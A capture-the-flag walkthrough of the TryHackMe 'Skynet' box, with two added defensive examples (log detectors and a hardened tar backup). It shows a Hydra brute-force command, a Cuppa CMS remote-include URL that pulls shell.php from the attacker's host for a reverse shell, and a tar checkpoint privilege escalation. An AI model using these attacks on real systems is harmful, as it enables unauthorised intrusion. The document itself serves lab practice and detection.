Skynet - THM

gh0stsh3ll5619
Published in System Weakness
8 min read · Jan 31, 2023

We're back again working another box from TryHackMe called Skynet. This is a Linux machine where we start by gaining access to a Samba server. From there we enumerate a web application, where we password spray to gain access to the application and find critical information that gets us into the protected Samba share. There we find a hidden subdirectory pointing to another login location, which we must exploit to gain initial access to the box. Then we must come up with a creative way to escalate privileges. Let's get into it.

We start as normal with our initial enumeration with Nmap.

nmap -sC -sV 10.10.50.71

We see that we get some ports back: 22, 80, 110, 139, 143 and 445. Looking at this information, we're going to start by enumerating ports 139 and 445.

So, I start with nmblookup and smbclient to get an understanding of the server.

So, we see we have an anonymous share as well as one called milesdyson. Let's try enum4linux next to enumerate further.

enum4linux -a

We get a lot of information back: the password policy (minimum password length), the SID, share information, and the system OS and name.

Next let's connect to the anonymous share with smbclient.

smbclient //10.10.11.55/anonymous

Since this is the anonymous share, when the password prompt appears just hit Enter to see if it needs creds. It doesn't, and we have access.

We see that we have a file, so let's grab it to see what's in it, and then further enumerate the logs directory.

We see that the passwords were all changed, so let's look at the logs. One file sticks out, so let's look at it.

This looks like it might be a username or password list, so let's keep it in case we need it. Since we're not seeing anything else, let's move on to enumerating port 80 (HTTP).

dirb http://10.10.50.71

We see that we found some directories, so let's look at /admin and /squirrelmail.

We see this is a login page. So, taking the information we found about the passwords, let's use that file as the password list and try the username we know about, "milesdyson".

So, we can brute force this with Hydra or use Burp to password spray. Since this is a web application, we need some information about the login form to perform the attack.

To start, let's open the developer tools with F12. We need the POST parameters of the form and the error message returned on a failed login.

With that information gathered, we can now run the brute force with Hydra.

hydra -l milesdyson -P log1.txt 10.10.87.63 -V http-form-post '/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^:Username or password invalid'

We see that we get a lot of results that we can test. We can also do this with Burp, as mentioned.

We start by capturing the request and sending it to Intruder.

We then mark the username and password fields as the positions where our payloads will be used. We will use the cluster bomb attack type. Make sure to set payload 1 to milesdyson and payload 2 to the .txt file we found.

We now look at what's different between the responses: the status code and the response length, which is the first highlighted section.

Let's log in with these creds, and we see that we gain access.

Let's look at the first email, the Samba password reset.

We see that we have the new password. Looking at the other emails, we see they are hex dumps. Let's try to decode them, but no information came from it.

Let's login to the share using the password we found.

smbclient //10.10.146.234/milesdyson -U milesdyson

We see that we have some files listed and a directory called notes. I'm interested in the directory, so let's look at that.

Hidden within all the notes there is one that sticks out, called important.txt, so let's grab that. We'll do this with the get command.

Now let's cat the file to see what’s inside.

We see that the file reveals a new CMS directory, so let's navigate to that.

We see that it's Miles Dyson's personal page. Since we found a new location, let's run some directory enumeration on it with dirb to see if we can find anything else. I also looked through the source code, but no information was provided.

dirb http://10.10.146.234/45kra24zxs28v3yd

We find /guestbook and /administrator. So, let's see what the admin directory has to offer.

Heading to the directory, we see that it is a login page for Cuppa CMS. We can try to enumerate further, but nothing else is really provided. So, let's use searchsploit to see if there is anything we can use to exploit it.

We find one exploit for it, so let's grab it and read what it says. The exploit states that we can perform an LFI to confirm the vulnerability, then turn it into RCE by supplying our own shell in the URL. So, let's test whether the LFI works.

Exploit Information.

We can see that the exploit worked, and we were able to pull the /etc/passwd information out.

Now let's put a .php reverse shell into a file and try to submit it as the exploit states. **Remember that we need to host the reverse shell.** We can do this with Python's built-in HTTP server, which listens on port 8000 by default.

python3 -m http.server

http://10.10.79.63/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.8.9.69:8000/shell.php

Before we send the request, make sure you start a netcat listener to catch the shell.

We see that it worked, and we now have a shell.
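From the defender's side, here is an added example (not part of the original write-up) of how the LFI probe and the urlConfig remote-include request described above would show up in an Apache access log, and how to flag them. The log lines, client addresses, timestamps and sizes are constructed for the example.

```shell
#!/bin/sh
# Added example, not from the write-up. Constructed Apache combined-log lines
# (hosts, timestamps and sizes are made up) mirroring the LFI probe and the
# urlConfig remote include used against the Cuppa CMS admin page above.
SAMPLE_LOG='10.0.0.5 - - [31/Jan/2023:10:00:01 +0000] "GET /45kra24zxs28v3yd/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [31/Jan/2023:10:00:09 +0000] "GET /45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=../../../../etc/passwd HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.5 - - [31/Jan/2023:10:00:15 +0000] "GET /45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://198.51.100.7:8000/shell.php HTTP/1.1" 200 77 "-" "Mozilla/5.0"
10.0.0.6 - - [31/Jan/2023:10:01:00 +0000] "GET /squirrelmail/src/login.php HTTP/1.1" 200 1337 "-" "curl/7.81"'

# Write the sample to a file so the detectors run exactly as they would on a
# real access log (each detect_* function takes a log path).
write_sample_log() {
    printf '%s\n' "$SAMPLE_LOG" > "$1"
}

# Requests whose query string hands a URL scheme (http/https/ftp) or a php://
# stream wrapper to a parameter: candidate remote-file-inclusion attempts.
detect_remote_include() {
    grep -Ei '\?[^" ]*=(https?|ftp|php)://' "$1" || true
}

# Requests with a ../ traversal sequence in the query string: the LFI probe
# that the Cuppa exploit runs first.
detect_traversal() {
    grep -E '\?[^" ]*\.\./' "$1" || true
}

# Distinct client addresses that hit either detector, one per line.
suspicious_sources() {
    { detect_remote_include "$1"; detect_traversal "$1"; } | awk '{print $1}' | sort -u
}
```

Run the detectors over a real access log path instead of the sample file to triage a live server; the same patterns apply to any include-style parameter, not just urlConfig.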

Let's look to see what we can find. Here you should have found the user.txt file. We also find some files called backup.sh and backup.tgz.

Let's cat the .sh file to see what it is.

We see that it's a script that creates a backup, probably run by a cron job. Let's try sudo -l to see if there is a way to conduct privilege escalation. It doesn't work, though, so more than likely we're going to need to exploit tar or the cron job.

Let's look at the cron jobs to make sure this is correct.

So, let's look at GTFOBins to see if there is anything we can do. We see that we can escalate with tar.

Let's go back to our /var/www/html directory and run the tar command to run the --checkpoint exploit. This will allow us to view all the information within that directory.

We see that the CLI hangs, allowing us to supply a bash script, so let's put in a bash one-liner reverse shell to see if it executes when the job runs.

Make sure you start another nc listener so that we can catch this shell. Now let's finish the rest of the checkpoint attack. First, I make the directory executable so we can run the command.

We see that we have a connection to our new netcat listener.

We can see that we are now root. Now let's navigate to /root to cat our root.txt file.
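An added example, not from the write-up or the box itself, for the backup-job weakness that made this escalation possible. It assumes backup.sh runs something like `tar cf backup.tgz *` from cron (an assumption, since the write-up does not show the script), which is what lets option-like file names reach tar. The first function spots such names in a backed-up directory; the second is the hardened form, which archives the directory as a single path so file names are never parsed as options.

```shell
#!/bin/sh
# Added example, not from the write-up or the box. Assumes backup.sh runs
# something like `tar cf backup.tgz *` from a cron job: the unquoted glob turns
# any file named --checkpoint=... into a tar option, which is the GTFOBins
# technique above. Neither function here executes anything from file names.

# List entries of DIR whose names begin with '-': with an unquoted glob these
# would be passed to tar as options rather than as files to archive.
find_option_like_names() {
    find "$1" -maxdepth 1 -name '-*' -exec basename {} \; | sort
}

# Hardened backup: archive the directory as the single path '.', so the shell
# never expands file names into tar's argument list. Option-like names are
# stored as ordinary members.
safe_backup() {
    src="$1"
    dest="$2"
    tar -cf "$dest" -C "$src" .
}

# Count archive members whose names look like options (./--something); after
# safe_backup this equals the number of option-like files, showing they were
# archived as data instead of being interpreted.
count_option_members() {
    tar -tf "$1" | grep -c '^\./-' || true
}
```

Running find_option_like_names against the web root from cron (or from a file-integrity monitor) gives an early warning that someone is staging this attack, independent of whether the backup script has been fixed.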

Congrats! We have exploited another box; this one was a fun one that did have some rabbit holes where it took me a little longer to complete. Remember to pay attention to the software that is being used. It took me a while to realize that this would be a tar privilege escalation attempt.

Please let me know if there is anything else you'd like to see or work through! Hopefully I'll have some more walkthroughs for everyone soon. Thanks for the visit, and I hope this could help.


Penetration tester for 8 years. For tactical testing, follow aressec.net. Follow me as I complete boxes to sharpen my skills and provide tips on pentesting.